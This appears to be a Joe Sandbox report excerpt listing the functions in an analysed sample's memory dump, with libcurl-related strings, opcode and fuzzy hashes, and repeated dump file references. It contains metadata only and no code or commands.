                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: default$login$macdef$machine$netrc.c$password
                                            • API String ID: 0-1043775505
                                            • Opcode ID: 958f53c1f923a6e3db0f81ed327c59698d8289b7b852d9c056f3601f65c8d8e4
                                            • Instruction ID: 4d9c6f63c1f0e8a21f1c18f071c409aa6066d072d0ae6b50a62dcd31f880f1c9
                                            • Opcode Fuzzy Hash: 958f53c1f923a6e3db0f81ed327c59698d8289b7b852d9c056f3601f65c8d8e4
                                            • Instruction Fuzzy Hash: 4CE1267090C359ABE721AE25988177BBBD0EF91308F1444ACFE8557282E3B5DD4CCB92
                                            Function 00BFA7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                            • API String ID: 0-4201740241
                                            • Opcode ID: b2efba5171ce510f18e39ddb57e6f5ac94fc9f4469a4d6dbf12576cbae1f2b84
                                            • Instruction ID: 12a089aeb62f316a1adfceee5ce75ba4d904c545a02cc3de99ec44bd38edbb0e
                                            • Opcode Fuzzy Hash: b2efba5171ce510f18e39ddb57e6f5ac94fc9f4469a4d6dbf12576cbae1f2b84
                                            • Instruction Fuzzy Hash: BF62F2B0914741DBD714CF20C890BAAB7E4FF98304F04956DE98D8B352E774EA98CB96
                                            Function 00F13A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                            • API String ID: 0-2839762339
                                            • Opcode ID: 8c0168d953914322be5b9d1b445777258e1ea5173d8c29b1c1139f375224f023
                                            • Instruction ID: 0185357987007ae3cec15a417472bb83a190277a5274f8817ddae7b88b1bc1eb
                                            • Opcode Fuzzy Hash: 8c0168d953914322be5b9d1b445777258e1ea5173d8c29b1c1139f375224f023
                                            • Instruction Fuzzy Hash: 78023CB1A083419FD725DF24DD41BEBB7E4EF94350F04842CE98987282EB35E985E792
                                            Function 00C4C900 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                            • API String ID: 0-3285806060
                                            • Opcode ID: dfdf06241bfb623825cc882ef2790ecf79f6d4be12b213e9b6bde837f9a88969
                                            • Instruction ID: fa99828e8a6a40829b8a20edf524ec65b4d380afb2891eb2fb10cb1ee361c8e2
                                            • Opcode Fuzzy Hash: dfdf06241bfb623825cc882ef2790ecf79f6d4be12b213e9b6bde837f9a88969
                                            • Instruction Fuzzy Hash: 25D10876E0A3018BD7649E28D8C137ABBD1BF91344F18893DF8D9972A1DB349D84D782
                                            Function 00F1CC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$@$gfff$gfff
                                            • API String ID: 0-2633265772
                                            • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                            • Instruction ID: 79a7ef8a9756ba813cd22d349acab66c5e3e37f469cfe3e097a7d328dc308c1a
                                            • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                            • Instruction Fuzzy Hash: 28D1E472A083058BD714DF29C88039BBBE2AFD4354F18C92DE8598B345D774DD89ABD2
                                            Function 00BB5EB0 Relevance: 4.4, Strings: 3, Instructions: 637COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$urlapi.c
                                            • API String ID: 0-3891957821
                                            • Opcode ID: e7b390492b6467a135abbc7f1230e4b1a636082abd794f1849efd42829ae8bfb
                                            • Instruction ID: fef09abc748e1c9578c10adf40146072ccf5505fc7b5ee57e3911bdfc483057c
                                            • Opcode Fuzzy Hash: e7b390492b6467a135abbc7f1230e4b1a636082abd794f1849efd42829ae8bfb
                                            • Instruction Fuzzy Hash: CD22BCA1A083415BEB245A248C917FBB7D5DB91314F1845AEF88A463C2FBBDDC488753
                                            Function 00F217A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $
                                            • API String ID: 0-227171996
                                            • Opcode ID: 7428c13b0146dac2c28c0ef0ae9823075625c5f678d84117d61cdca5de9c38ce
                                            • Instruction ID: 6d2f31920ee7ad45d7ac6073f3be67c08dcb5fbcbdfa975d55c93872dce33853
                                            • Opcode Fuzzy Hash: 7428c13b0146dac2c28c0ef0ae9823075625c5f678d84117d61cdca5de9c38ce
                                            • Instruction Fuzzy Hash: 49E251B1A083A19FD360DF29D48075AFBE0BF88754F10891DE88997351E779E844EF82
                                            Function 00BFA5B0 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .12$M 0.$NT L
                                            • API String ID: 0-1919902838
                                            • Opcode ID: e2fe44c49008a426cdd6181bd2556c0077c58ef982cc295a4b51ba01f2d71aed
                                            • Instruction ID: 340ac0aa2769a36be23989aaa3e5a6dc17c3f75eaa75cdbd336f42b3769b4fb8
                                            • Opcode Fuzzy Hash: e2fe44c49008a426cdd6181bd2556c0077c58ef982cc295a4b51ba01f2d71aed
                                            • Instruction Fuzzy Hash: 7251C3B46003499BDB159F20C8C4BAA77F8EF48304F1485A9ED4C9F252E775DE88CB96
                                            Function 00BBDCF0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                            • API String ID: 0-424504254
                                            • Opcode ID: c5dae620999645df65b31ad746a3204b016439f9e46bf3e1c2cfdc52887c18d1
                                            • Instruction ID: 156eac117f25a5769a49da7946a99a123cd825ecba51ce76b9328a0f5d93ee4f
                                            • Opcode Fuzzy Hash: c5dae620999645df65b31ad746a3204b016439f9e46bf3e1c2cfdc52887c18d1
                                            • Instruction Fuzzy Hash: 1B314762A087515BEB29293D9C81BB57AC1DFA1318F1C47BCE4D59B292FADD8C00C791
                                            Function 00F08BF0 Relevance: 3.0, Strings: 2, Instructions: 511COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$4
                                            • API String ID: 0-353776824
                                            • Opcode ID: 7d07e08d686842b9eee1800dc0e968fb5c5182dba69e2b427b19bfe035a2da88
                                            • Instruction ID: 4893f5b758a97e4e2560eab9eca4fb2ab1e11bfe8b0f045adebff59e46bd64ed
                                            • Opcode Fuzzy Hash: 7d07e08d686842b9eee1800dc0e968fb5c5182dba69e2b427b19bfe035a2da88
                                            • Instruction Fuzzy Hash: C322C431A097418FC714DF28C8806AAF7E1FF84354F148B2DE8D997391E774A885EB92
                                            Function 00F01BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #$4
                                            • API String ID: 0-353776824
                                            • Opcode ID: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                            • Instruction ID: 3cb212bad88e07b1391db7f8ecf9cc8a27fd95d466fce73982a0ad3b110a17d3
                                            • Opcode Fuzzy Hash: aa3d81908d3ecfc74d4f23fb4c6d5a0f05227800a08e888fb616fbf31a5ebd1e
                                            • Instruction Fuzzy Hash: AB12D132A087018BC764CF18C4847ABB7E5FFC4318F198A7DE99957391D774A884EB92
                                            Function 00F14780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: H$xn--
                                            • API String ID: 0-4022323365
                                            • Opcode ID: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                            • Instruction ID: c551bd1807c12c6d7fa68215a83658bc4cdf9ed76a2b78f5d760dbd2c13cf357
                                            • Opcode Fuzzy Hash: 2bbdfb34b130b8f4256b61872e90278cf9ddadab548dc9f766a57435d3ee466e
                                            • Instruction Fuzzy Hash: 5DE14B72A083158FD718DE28D8D07AEB7D2AFC4324F198A3DD99687381D774EC859782
                                            Function 00BA10E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
